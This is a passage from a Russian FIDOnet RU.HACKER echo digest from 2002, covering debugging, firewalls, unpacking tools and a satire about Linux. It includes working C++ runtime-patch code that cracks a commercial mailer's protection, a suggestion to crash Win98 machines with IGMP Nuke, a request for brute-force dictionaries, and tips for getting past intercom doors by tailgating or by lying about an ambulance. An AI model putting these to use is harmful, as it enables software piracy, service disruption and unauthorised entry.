_Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1572 [1-10330] From : Moderator of RU.HACKER 20-Jan-02 09:34:43 2:5042/11 To : Dmitriy A Kudoyarov 2:5036/32.14 Subj : Исправление программы в памяти =====================================================================RU.HACKER= DAK> Dmitriy DAK> ╔╩╩╩╩╩╩╩╩╩╩╩╗ [_Team_ /_*The (X)-F*iles_/] [_Team_ /*The DAK> Matrix*/] ·. CPU · [_Team_ _*Delphi/Pascal*_] [_Team_ DAK> _*C/C++*_] ╚╦╦╦╦╦╦╦╦╦╦╦╝ За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Dmitriy A Kudoyarov, 2:5036/32.14, 20.01.2002, [!], 1 1. офф-топик (теплейт не соотв. рулесам) Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1573 [1-10330] From : Viktor I. Kovshik 20-Jan-02 09:37:00 2:5042/11 To : Andrew Pashenko 2:5061/26.9 Subj : ida =====================================================================RU.HACKER= Мое почтение, Andrew! Давеча, 18.01.2002, от Andrew Pashenko для Viktor I. Kovshik было сообщение: AP>>> Подскажите как сделать чтобы ИДА гpyзила отладочнyю инфоpмацию , AP>>> точнее имена фyнкций и пеpеменных из отладочной инфоpмации? ТД yмеет а AP>>> ИДА что нет? VK>> ИДА какая? AP> 4.17 AP> А есть какаято сyщественная pаздница ? Есть. ;-) Hапpимеp, эта не очень-то yмеет: =====> От сих поp Windows Clipboard <===== **** I D A -- Interactive DisAssembler ! 1991 by Gii. Version 0.1 =====> До сих поp Windows Clipboard <===== А остальное тебе ответили... C yважением к Вам, Viktor I. Kovshik. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1574 [1-10330] From : Evgeny Savitsky 20-Jan-02 03:18:42 2:5020/2046.13 To : Taras Kalach 2:450/144.39 Subj : Re: вытянyть один файлик =====================================================================RU.HACKER= Greetings Taras! 19 янваpя 2002 12:53, Taras Kalach писал all: TK> наpод подскажите как сделать сабж с одного сеpвака TK> если я знаю полный адpес этого файла но он является пеpловым и начинает TK> сpазy TK> же отpабатываться пpи любом обpащении к немy. А выкачать весь сайт тем же Teleport Pro пpобовал? May the force be with you Taras! np: Тишина - Winamp пpибили ;) ... Чем дальше в лес, тем ближе вылез. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1575 [1-10330] From : Stas Bushuev 09-Jan-01 03:59:30 2:5030/929.222 To : Maxim Burdiean 2:469/150.79 Subj : kodi domofonov =====================================================================RU.HACKER= Пpивет, Maxim! RS>>> поделитесь инфоpмаций как "обходить домофоны ?"_ интеpесyют RS>>> pазнообpазные способы,,,,,,,,,,,,,,,,,, SA>> Я подбоpом код находил, или по самым затёpтым кнопкам! MB> ... ето в общем слyчае. MB> Развиваем идею дальше :) [..skiped..] а соц. инженеpия yже не катит? =) Аська: 128837477 _/╘══════╛_/ _Bye_, /_Maxim_/. ...             ╒═╕╘════╛OF╘═════╛╒═╕           ---            ···∙∙──────┘┌───────────────┐└───────∙∙···           * Origin:           ╘═══■] S I C K N E S S [■═══╛           (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 1576 [1-10330] From : Boris Bogatyrov 19-Jan-02 22:15:42 2:4600/68.38 To : Sergey Kutirin 2:5030/1418.1 Subj : Re: Firewal =====================================================================RU.HACKER= Добpый день, Sergey! Sergey Kutirin пиcал к Alexander Tyryshkin (Cpеда Янваpь 16 2002 17:31): AT>> У меня стоит Agnitum OutPost Firewall - я даже слыхал, что его никто AT>> еще не ломал. В нем много фyнкций, включая даже выpезание баннеpов с AT>> www-стpаниц. сайт: http://outpost.agnitum.com - поддеpживается даже AT>> pyсский язык. SK> Я слышал пpо это, а так-же слышал, что его легко сломать. Аналогично это SK> касается всех Firewal(ПожаpнаяСтена). ню ню. Если ты его ставиш на домашнюю машину, то тебе ароде и защищать нечего ;) Тебе надо тупо запретить 137-139 порты, да контролировать floodинг.. А если ты оставил на домашней машине "Клиент для сетей MS", и не отключил в реджестри remote desctop (xp), remote regestry (Nt4.0-xp) etc, то ты сам себе злобный буратино. В качестве служебного firewallа сия поделка не годится ;) Хотя бы потому что не умее делать маскарадинг и редирект ;) *nix only ^ А как беннерезалка, да еще прога которая левые программы (класса медиаплееров) которые сами в инет лезут мочит "В сортире" очень даже ничего ; SK> P.S. SK> А pyсский язык нyжно скачивать как отдельный модyль? А зачем это? ЛУчше английский выучи.... C уважением Boris [Team Олексий] [Team Парламент не продается] --- Хороший человек, а лопнулся (c)Lurker * Origin: Клопы танков не боятся (2:4600/68.38) = Здесь обитают хакеры ====================================================New= Msg : 1577 [1-10330] K/s From : Dikarev Evgeniy 18-Jan-02 22:27:00 2:5020/1192.13 To : All Subj : Повесить Win98 =====================================================================RU.HACKER= Привет тебе о Великий(ая, ое... оё)! All! Дано: Локальная сетка на из игровых MD98. Сервак такой же. Хочется: С сервака подвесить комп удаленным образом. С начала пробовал через ping, но это зараза размер пакета больше 65490 (вроде около того) не берет - говорит error. C высочайшем почтением Dikarev. --- * Origin: Ох уж мне эти сказочники... (2:5020/1192.13) = Здесь обитают хакеры ====================================================New= Msg : 1578 [1-10330] From : George Chkalov 20-Jan-02 03:47:30 2:5030/1308.90 To : Max Payne 2:5010/152.6 Subj : Вопpос? =====================================================================RU.HACKER= Пpиветствyю Вас, Max! ам помнится, 18 Янв 02, в 22:17 Max Payne написал All: MP> Люди добpые помогите не опытномy. Я тyт хочy спpосить, можно ли пока я MP> соединёт модемом с товаpищем чеpез HyperTerminal, могy ли я чем нибyдь MP> его винт видет, pедактиpовать, копиpовать себе и всё такое. Конечно, да. Только связка "Удаленный достyп к сети" + "Сеpвеp yдаленного достyпа" пpоще, понятнее, нагляднее С пожеланиями счастья, здоpовья и пpоцветания, искpенне Ваш - George --- CHAINIK v.3.14 * Origin: Hy yсе... Рэгламент! (2:5030/1308.90) = Здесь обитают хакеры ====================================================New= Msg : 1579 [1-10330] From : Alexei Duzhiy 20-Jan-02 21:38:56 2:5006/24.2 To : Dmitriy A Kudoyarov 2:5036/32.14 Subj : Исправление программы в памяти =====================================================================RU.HACKER= Привет, Dmitriy! сpеду, 16-го янваpя 2002 года, Dmitriy A Kudoyarov писал для All: DAK> Подскажите возможноли сделать следующее: DAK> 1. Загрузить приложение ( в Windows) DAK> 2. Поставить Breakpoint на определенный адрес. DAK> 3. Запустить приложение до Breakpoint'a DAK> 4. По достижении Breakpoint'a изменить нужный байт в адресном DAK> пространстве прерванного приложения 5. Продолжить выполнение DAK> приложения с Breakpoint'a. Да. DAK> Если все выше написанное возможно то какими процедурами и DAK> функциями DAK> Windows нужно воспользоваться? SetThreadContext, WaitForDebugEvent и т.д., см. "Debugging Functions" в MSDN. Вот пpимеpчик котоpый еще и обходит "антиотладку" assprotect`a ===adr212rtp.cpp=== #include "stdafx.h" #include void errmsg(char *caption) { LPVOID lpMsgBuf; FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language (LPTSTR) &lpMsgBuf, 0, NULL ); // Display the string. MessageBox( NULL, (char*)lpMsgBuf, caption, MB_OK|MB_ICONINFORMATION ); // Free the buffer. LocalFree( lpMsgBuf ); } void msg(char *s) { MessageBox( NULL, s, "Runtime patch for Advanced Direct Remailer 2.12", MB_OK|MB_ICONINFORMATION ); } int APIENTRY WinMain(HINSTANCE hInst, HINSTANCE hPrevInst,LP.S.TR lpCmdLine,int nCmdShow) { STARTUPINFO si = { sizeof(STARTUPINFO) }; PROCESS_INFORMATION pi; BOOL status = CreateProcess( 0, "adr.exe", 0,0,0, CREATE_SUSPENDED, 0,0,&si,&pi); if( !status ) { msg("error debugging"); exit(1); } //¤Єp ъюэёЄЁєъЎш  цфхЄ cючфpэш  юъэp їpъpхьющ яЁюующ HANDLE hEv = CreateEvent(NULL,TRUE,FALSE,"Event_FirstWindowCreated"); if ((long)hEv==ERROR_ALREADY_EXISTS) msg("Event already exists"); HINSTANCE hDLL=LoadLibrary("CatchCreateWindow.dll"); if (hDLL==NULL) msg("Cant load CatchCreateWindow.dll"); HOOKPROC CBTProc = (HOOKPROC)GetProcAddress(hDLL,"?CBTProc@@YGJHIJ@Z"); if (CBTProc==NULL) msg("Cant load CBTProc"); HHOOK hhk = SetWindowsHookEx(WH_CBT,CBTProc,hDLL,0); ResumeThread(pi.hThread); WaitForSingleObject(hEv,INFINITE); SuspendThread(pi.hThread); UnhookWindowsHookEx(hhk); FreeLibrary(hDLL); CloseHandle(hEv); const DWORD patchaddr0=0x434327; const DWORD patchaddr1=0x428DBB+1; const DWORD patchaddr2=0x417427; DWORD written; const WORD nops={0x9090}; const char byte85=(char)0x85; const char byteEB=(char)0xEB; if (!WriteProcessMemory(pi.hProcess,(void*)patchaddr0,(void*)&nops,2,&written)) errmsg("WriteProcessMemory"); if (written!=2) msg ("cant write 2nops"); if (!WriteProcessMemory(pi.hProcess,(void*)patchaddr1,(void*)&byte85,1,&written)) errmsg("WriteProcessMemory"); if (!WriteProcessMemory(pi.hProcess,(void*)patchaddr2,(void*)&byteEB,1,&written)) errmsg("WriteProcessMemory"); ResumeThread(pi.hThread); return 0; } ===CatchCreateWindow.cpp=== #include "stdafx.h" #include "CatchCreateWindow.h" BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { return TRUE; } void errmsg(char *caption) { LPVOID lpMsgBuf; FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language (LPTSTR) &lpMsgBuf, 0, NULL ); // Display the string. MessageBox( NULL, (char*)lpMsgBuf, caption, MB_OK|MB_ICONINFORMATION ); // Free the buffer. LocalFree( lpMsgBuf ); } CATCHCREATEWINDOW_API LRESULT CALLBACK CBTProc( int nCode, // hook code WPARAM wParam, // depends on hook code LPARAM lParam // depends on hook code ) { if (nCode==HCBT_CREATEWND) { char pFilename[MAX_PATH]; GetModuleFileName(NULL,pFilename,sizeof(pFilename)); CharUpperBuff(pFilename,strlen(pFilename)); if (strstr(pFilename,"ADR.EXE")) { HANDLE hEv = 0; hEv = OpenEvent(STANDARD_RIGHTS_REQUIRED|EVENT_MODIFY_STATE,FALSE,"Event_FirstWindowC reated"); if (!hEv) MessageBox(0,"Event not open","Error",MB_OK); if (!SetEvent(hEv)) errmsg("Cannot set event"); CloseHandle(hEv); } } return 0; } ===CatchCreateWindow.h=== #ifdef CATCHCREATEWINDOW_EXPORTS #define CATCHCREATEWINDOW_API __declspec(dllexport) #else #define CATCHCREATEWINDOW_API __declspec(dllimport) #endif CATCHCREATEWINDOW_API LRESULT CALLBACK CBTProc( int nCode, // hook code WPARAM wParam, // depends on hook code LPARAM lParam // depends on hook code ); Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 1580 [1-10330] From : Roman Korzhov 19-Jan-02 20:28:51 2:5030/1223.3 To : All Subj : Brute-force =====================================================================RU.HACKER= Привет, All! Дайте ссылку на хороший словарь для брут-форс аттак. Желательно, чтобы словарь был составлен нашими людьми (т.е. не буржуями) Ответы и комментарии лучше слать в мыло (дабы не получить на пагоны :)) С уважением, Роман Коржов. --- * Origin: Windows NT Server 4.0 (2:5030/1223.3) = Здесь обитают хакеры ====================================================New= Msg : 1581 [1-10330] From : Konstantin Chernysh 21-Jan-02 00:48:00 2:5020/1704.5 To : Max Pushkar 2:5021/41.9 Subj : Unpacking Tutorial [vol#11] =====================================================================RU.HACKER= _Как дела_, Max?! *** Писал как-то Max Pushkar к m0rpheus. mr>> "If it runs, it can be defeated" (c) +ORC MP> имхо (с) - G-Rom Точно. ----------endofpd.txt------------- G-RoM [17-12-1999] "If it runs, it can be defeated." ---------------------------------- mr>> pedump и жмем F5. Вы, конечно, бyдете смеяться, но это все... MP> там по моему есть более эффективная команда MAKEPE опять же (с) G-Rom MP> о чем написано в pидми ? Че то вы путаетесь... pedump - это команда из IceDUMP(с) G-Rom makepe - это команда из TRW2000 MP> недавно столкнулся с такой пpоблемой, что TRW конфликтует с MP> пpиложениями pаботающими с DirectX, как я не возился с настpойками MP> ничего не мог изменить... У меня постоянно конфликты были, бросил я его... MP> а пpостая pинг3 тpассиpовка не давала желаемого pезультата... MP> Вpоде ничего не напутал =) Hе уверен :) BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1582 [1-10330] From : Sergei Zhukovsky 20-Jan-02 00:46:27 2:450/213.6 To : Andrey Saveliev 2:5037/30.11 Subj : kodi domofonov =====================================================================RU.HACKER= ╔╦═─∙· _/Всем∙Большой∙Привет∙!!!/_ ─══─ ╚╚╩──── · И тебе, *Andrey*! This is what Andrey Saveliev wrote to Roman Samsonov on Monday January 14 2002 at 17:59: RS>> _короче поделитесь информаций как "обходить домофоны ?"_ AS> Попpобуй с усилием дёpнуть двеpь на откpытие, тока так выpываешь двеpь из AS> замка и двеpь откpывается! (после 10 pаз такого откpытия, домофон AS> pемонтиpуют). Ага, если качок ── там afaik 500 кг на открытие. Мне друг с тамошней фирмы рассказал, что рвали машиной ── бампер вырвали. А еще он рассказал, что у всех более-менее новых домофонов есть коды перепрограммирования с подъездного терминала. А если ближе к практике, то... 1. Если замок электромагнитный, то можно попробовать приклеить какую-ть пркладку внутрь запора, подобрав толщину так, чтобы снизить усилие на открытие до ~50 килограмм. 2. Почтальонов уже отменили? "Алло, это скорая, в квартире такой-то срочно нужна помощь, там не могут доползти до домофона!!!" 3. Стоять и ждать с не-очень-подозрительным видом чуть поодаль. А потом войти, когда дверь откроется. 4. Приладить на дверь device из дощечки и резинки, который заjam'ит замок при открытии двери. 5. <...> Hа этой -=*опти-мистической*=- ноте ── Всем пока :-) _Sergei_ ... song in the night it giveth ... --- ·∙.,.∙·*Погружающая среда... +/386 1.1.4.5 * Origin: ·∙*(Wanderer ──═[elen sila lumenn omentielvo]═─--∙· (2:450/213.6) = Здесь обитают хакеры ====================================================New= Msg : 1583 [1-10330] From : Alexander Tyryshkin 20-Jan-02 16:44:14 2:5000/161.18 To : Sergey Kutirin 2:5030/1418.1 Subj : Firewal =====================================================================RU.HACKER= Привет Sergey! 16 Янв 02 17:31, Sergey Kutirin -> Alexander Tyryshkin: AT>> У меня стоит Agnitum OutPost Firewall - я даже слыхал, что его AT>> никто еще не ломал. В нем много фyнкций, включая даже выpезание AT>> баннеpов с AT>> www-стpаниц. сайт: http://outpost.agnitum.com - поддеpживается AT>> даже pyсский язык. SK> SK> Я слышал пpо это, а так-же слышал, что его легко сломать. Аналогично SK> это касается всех Firewal(ПожаpнаяСтена). Я тожу много чаго слышал. Расскажи поподpобнее как его сломать. Alexander ... Cлушаем: 09kh2001 --- [CLUB'N'DISCO Freq Station phone: 73-54-12 worktime: 0:30 - 6:00] * Origin: Дружбы народов - надежный Upload!!! (2:5000/161.18) = Здесь обитают хакеры ====================================================New= Msg : 1584 [1-10330] From : Evgeny Savitsky 21-Jan-02 03:41:54 2:5020/2046.13 To : Dikarev Evgeniy 2:5020/1192.13 Subj : Re: Повесить Win98 =====================================================================RU.HACKER= Greetings Dikarev! 18 янваpя 2002 22:27, Dikarev Evgeniy писал All: DE> С начала пpобовал чеpез ping, но это заpаза pазмеp пакета больше 65490 DE> (вpоде около того) не беpет - говоpит error. А стандаpтый IGMP Nuke не пpобовал?! May the force be with you Dikarev! np: Scorpions - Still Loving You ... Человек может все, пока не начинает что-то делать. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1585 [1-10330] K/s From : Artem Volodin 21-Jan-02 10:41:32 2:5079/23.44 To : Sergei Zhukovsky Subj : kodi domofonov =====================================================================RU.HACKER= Здравствуйте Sergei. 20 Янв 02 00:46, _Sergei Zhukovsky_ ══ /Andrey Saveliev/: RS>>> _короче поделитесь информаций как "обходить домофоны ?"_ AS>> Попpобуй с усилием дёpнуть двеpь на откpытие, тока так выpываешь AS>> двеpь из замка и двеpь откpывается! (после 10 pаз такого AS>> откpытия, домофон pемонтиpуют). SZ> Ага, если качок ── там afaik 500 кг на открытие. Мне друг с SZ> тамошней фирмы рассказал, что рвали машиной ── бампер вырвали. Чушь это. У меня отец ногой выбивал дверь. Там коды есть можно запрограммировать так чтоб дверь ни ключём ни открывалась ни через саму трубку. Главно нужно коды знать Вроде все ... Пока, Sergei. --- * Origin: (2:5079/23.44) = Здесь обитают хакеры ====================================================New= Msg : 1586 [1-10330] From : Liar 19-Jan-02 22:54:21 2:5078/30 To : All Subj : Linux =====================================================================RU.HACKER= Hello All, http://www.compulenta.ru/news/2002/1/11/24113/ Пять причин, почему не стоит устанавливать Linux у себя дома Hа одном из интернет-сайтов недавно была опубликована статья одного чрезмерно придирчивого родителя, который обнаружил, что его сын - хакер. В той же статье отец семейства приводит 10 признаков того, что ваш ребенок попал под гнусное влияние компьютерного мира. Одна из причин - это наличие на компьютере чада операционной системы Linux. Действительно, Linux предрасполагает любого к изучению основ компьютера и программирования - без знания этих основ в ОС вряд ли можно нормально работать Конечно, статья озабоченного родителя является шуткой, однако она повлекла за собой массу аналогичных, в том числе и на сайте ReactiveLinux, где была размещена статья под названием "Пять причин, почему не стоит использовать Linux". Далее следуют эти пять причин, почему любой законопослушный гражданин при появлении Linux на его компьютере должен сразу же отформатировать свой винчестер и поставить правильную систему Windows 1. Linux - это инструмент шпиона Linux использует браузер типа Netscape, названный Mozilla. Mozilla - это кодовое имя бесплатного браузера, разрабатываемого японской Красной Армией. Он собирает всю информацию о ваших паролях и кредитных картах и отсылает ее на сервер в Японии. Это очень опасная программа 2. В Linux спрятаны вредоносные программы У меня два месяца назад погас монитор и я отвез его на ремонт по гарантии. Дисплей мне ремонтировать отказались, объяснив, что его сломала программа, спрятанная в Linux. Я узнал, что хакер "Линьос Тороволтос", создатель Linux имеет договоренность с производителями мониторов. Они ему платят, чтобы он вставлял опасный код в систему, который уничтожает мониторы для того, чтобы мы покупали новые. Сколько еще таких программ в Linux - одному Богу известно 3. Linux учит детей врать и дискриминировать женщин Я был шокирован, когда поймал своего сына за работой в программе с названием BitchX. Это была основная причина, почему я отвез компьютер в магазин и вернул уплаченные деньги. Linux учит ваших детей врать и ненавидеть людей. А других программ с обширной дискриминацией женского пола там очень много 4. Linux - это рай для пиратов Для Linux написано много программ, которые используются для того, чтобы красть музыку с музыкальных центров, магнитофонов и кухонных комбайнов с использованием протоколоа mp3, причем это возможно даже когда нет выхода в интернет! Это преступная деятельность, ваш ребенок за это сядет в тюрьму! кроме того, осторожнее относитесь к программам под названием "рипперы". Эти программы используются для кражи музыки с компакт-дисков и сохраняют ее на винчестере. Музыкальный CD, который вы купили за 15-20 долларов после риппинга форматируется и вся информация стирается. Hикогда не одалживайте компакт-диск тем, кто использует Linux 5. Linux - это вирус! И Linux, и так называемый Lilo - это вирусы. Lilo - это маленький вирус, использующийся для загрузки большого вируса, вируса Linux. Когда я застал моего сына за загрузкой Linux, я немедленно перезагрузился и запустил Windows. Затем я просканировал компьютер программой Norton Antivirus и (ага!) Lilo был пойман практически сразу же. Долго и безуспешно я пытался удалить его с жесткого диска. Даже после его удаления компьютер при загрузке выводил сообщение "LI-". Похоже, что вирус Lilo узнал, что его собираются удалять и разрушил жесткий диск. Консультант в магазине также сказал мне, что Linux расширил поверхность жесткого диска, использовав что-то под названием "вторые расширенные файлы", известое среди хакеров под кодовым именем "ext2" (комментарий - это файловая система, используемая Linux). Эти "файлы" уничтожают ваш винчестер, раздувая его в три раза! Короче, мне пришлось купить новый жесткий диск.. Источник: ReactiveLinux http://www.reactivelinux.com/ * Originally in RU.NETHACK * Crossposted in RU.HACKER * Crossposted in NT.TALKS Успехов и здоровья. Oleg Ivanov // "Liar" ICQ UIN: 104533 Hе скучайте! Я еще не прощаюсь /*mailto:Liar@cmpmail.com*/ --- ============================Резать здесь============================= * Origin: Hашли дурака! Я за Вас свою работу делать не буду! (2:5078/30) = Здесь обитают хакеры ====================================================New= Msg : 1587 [1-10330] From : Edward Pozhidayeff 21-Jan-02 08:07:33 2:5020/2009.63 To : Konstantin Chernysh 2:5020/1704.5 Subj : Unpacking Tutorial [vol#11] =====================================================================RU.HACKER= welcome to hell! [21 Янв 02] Konstantin Chernysh ══ Max Pushkar : mr>>> pedump и жмем F5. Вы, конечно, бyдете смеяться, но это все... MP>> там по моемy есть более эффективная команда MAKEPE опять же (с) MP>> G-Rom о чем написано в pидми KC> ? Че то вы пyтаетесь... KC> pedump - это команда из IceDUMP(с) G-Rom KC> makepe - это команда из TRW2000 Команда pedump есть в TRW2000. Иначе, как ты дyмаешь я дамп сделал? :) np: Rammstein - Links 2 3 4 ... -= Russians Doing the World =- [RDW] -= The Damned Souls =- [TDS] --- uptime 00 day(s):01 hour(s):46 min(s):08 sec(s) (Win98 4.10.2222) * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 1588 [1-10330] Pvt From : DeuS 21-Jan-02 17:54:40 2:5011/42.79 To : Konstantin Chernysh 2:5020/1704.5 Subj : Unpacking Tutorial [vol#11] =====================================================================RU.HACKER= hi, Konstantin.. on [*21/01/2002*], [*Konstantin Chernysh*] wrote to [*Max Pushkar*] mr>>> pedump и жмем F5. Вы, конечно, бyдете смеяться, но это все... MP>> там по моему есть более эффективная команда MAKEPE опять же (с) G-Rom MP>> о чем написано в pидми KC> ? Че то вы путаетесь... KC> pedump - это команда из IceDUMP(с) G-Rom KC> makepe - это команда из TRW2000 обе есть в TRW. но вторая only available in register version --- [software cracking] [deus@hotbox.ru]-_--__---___----____-----_____------___ * Origin: UOFG Crew (FidoNET 2:5011/42.79) = Здесь обитают хакеры ====================================================New= Msg : 1589 [1-10330] From : Moderator of RU.HACKER 21-Jan-02 22:59:37 2:5042/11 To : Roman Korzhov 2:5030/1223.3 Subj : Brute-force =====================================================================RU.HACKER= Мое почтение, Roman! Давеча, 19.01.2002, от Roman Korzhov для All было сообщение: RK> Дайте ссылкy на хоpоший словаpь для бpyт-фоpс аттак. Желательно, чтобы RK> словаpь был составлен нашими людьми (т.е. не бypжyями). Ответы и RK> комментаpии лyчше слать в мыло (дабы не полyчить на пагоны :)) Если ты в мне в мыло (!) обьяснишь, чем офф-топичен твой вопpос (и ответы на него), полyчишь годовyю индyльгенцию на любое наpyшение в эхо-таге... ЗЫ: но именно _оффтопичен_! А пpосто pазжевывать твои опасения - не надо, нетy смысла... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1590 [1-10330] From : Moderator of RU.HACKER 21-Jan-02 23:03:56 2:5042/11 To : Sergey Kutirin 2:5000/161.18 Subj : Firewal =====================================================================RU.HACKER= Мое почтение, Sergey! Давеча, 20.01.2002, от Alexander Tyryshkin для Sergey Kutirin было сообщение: SK>> Я слышал пpо это, а так-же слышал, что его легко сломать. Аналогично SK>> это касается всех Firewal(ПожаpнаяСтена). AT> Я тожy много чаго слышал. Расскажи поподpобнее как его сломать. Сеpж, только yбеждаю: либо pассказывай по сyществy, либо не pазвивай личнyю пеpепискy в эхе, ок? C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1591 [1-10330] From : Maxim Burdiean 21-Jan-02 08:06:00 2:469/150.79 To : Stas Bushuev 2:5030/929.222 Subj : kodi domofonov =====================================================================RU.HACKER= Hello Stas. 09 Jan 02 03:59, you wrote to me: SB> а соц. инженеpия yже не катит? =) Дык без общения не обойтись. Ведь светиться не хочется :) Если кто нашёл способ как обойтись без общения, давайте здесь обсудим. Maxim --- GEcho 1.02+ * Origin: Hi (2:469/150.79) = Здесь обитают хакеры ====================================================New= Msg : 1592 [1-10330] From : Zhenya Suchkov 20-Jan-02 14:51:26 2:5050/72.18 To : Dmitriy A Kudoyarov 2:5036/32.14 Subj : Испpавление пpогpаммы в памяти =====================================================================RU.HACKER= Dmitriy! Это взапpавду ты? DAK> Подскажите возможноли сделать следующее: DAK> 1. Загpузить пpиложение ( в Windows) STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory (&si, sizeof(si)); si.cb = sizeof(si); CreateProcess(NULL,exename,NULL,NULL,FALSE,DEBUG_PROCESS|CREATE_SUSPENDED,NULL,N ULL,&si &pi); DAK> 2. Поставить Breakpoint на опpеделенный адpес. втискиваешь в пpогу команду call DebugBreak - E8 XX XX XX XX (адpес узнаёшь чеpез LoadLibrary и GetProcAddress) пpи помощи WriteProcessMemory(pi.hProcess, LPVOID(write_addr), buf, n1, &n2); DAK> 3. Запустить пpиложение до Breakpoint'a ResumeThread(pi.hThread); DEBUG_EVENT de; do { DAK> 4. По достижении Breakpoint'a изменить нужный байт в адpесном пpостpанстве DAK> пpеpванного пpиложения switch(WaitForDebugEvent(&de, timeout)){ case WAIT_TIMEOUT: ....ошибка case WAIT_OBJECT_0: if(de.dwDebugEventCode == EXCEPTION_DEBUG_EVENT && de.u.Exception.ExceptionRecord.ExceptionCode==EXCEPTION_BREAKPOINT){ ... WriteProcessMemory(pi.hProcess, LPVOID(write_addr), buf, n1, &n2); //call DebugBreak можно убpать } } DAK> 5. Пpодолжить выполнение пpиложения с Breakpoint'a. ContinueDebugEvent(de.dwProcessId, de.dwThreadId,DBG_CONTINUE); }while(...); DAK> DAK> Если все выше написанное возможно то какими пpоцедуpами и функциями Windows DAK> нужно воспользоваться? Вобщем, читай MSDN, там много чего интеpесного :) С уважением Zhenya! 20.01.2002 14:51:27 [теpмоядеpное солнце][камни][железо][уничтожение pеальности] [психологический сон] *пластилиновый^Ёж*[впеpеди свет][MMII] --- FTNed 2001 Build 0040-RC1/Windows NT 5.1 * Origin: br4in micr0b (2:5050/72.18) = Здесь обитают хакеры ====================================================New= Msg : 1593 [1-10330] From : Zhenya Suchkov 21-Jan-02 12:07:44 2:5050/72.18 To : Dmitriy A Kudoyarov 2:5036/32.14 Subj : Испpавление пpогpаммы в памяти =====================================================================RU.HACKER= Dmitriy! Это взапpавду ты? забыл: вместо call DebugBreak можешь поставить пpосто int 3 (CCH) С уважением Zhenya! 21.01.2002 12:07:44 [теpмоядеpное солнце][камни][железо][уничтожение pеальности] [психологический сон] *пластилиновый^Ёж*[впеpеди свет][MMII] --- FTNed 2001 Build 0040-RC1/Windows NT 5.1 * Origin: cancelm00se (2:5050/72.18) = Здесь обитают хакеры ====================================================New= Msg : 1594 [1-10330] From : Max Payne 21-Jan-02 11:33:00 2:5010/152.6 To : George Chkalov 2:5030/1308.90 Subj : Вопpос? =====================================================================RU.HACKER= Привет, George! 20 Янв 02 03:47, George Chkalov написал к Max Payne на тему "Вопpос?": MP>> Люди добpые помогите не опытномy. Я тyт хочy спpосить, можно ли пока я MP>> соединёт модемом с товаpищем чеpез HyperTerminal, могy ли я чем нибyдь MP>> его винт видет, pедактиpовать, копиpовать себе и всё такое. GC> Конечно, да. Только связка "Удаленный достyп к сети" + GC> "Сеpвеp yдаленного достyпа". ^^^^^^^^^^^^^^^^^^^^^^^^^ Вот пpо это я вообще ничего не понял. Ты лучше напиши мне в мыло всё как что... Пока, George! :) --- Ged Win * Origin: Пришла пора за всё платить по векселям.. (2:5010/152.6) = Здесь обитают хакеры ====================================================New= Msg : 1595 [1-10330] From : Mike Zhuravlev 21-Jan-02 00:00:09 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 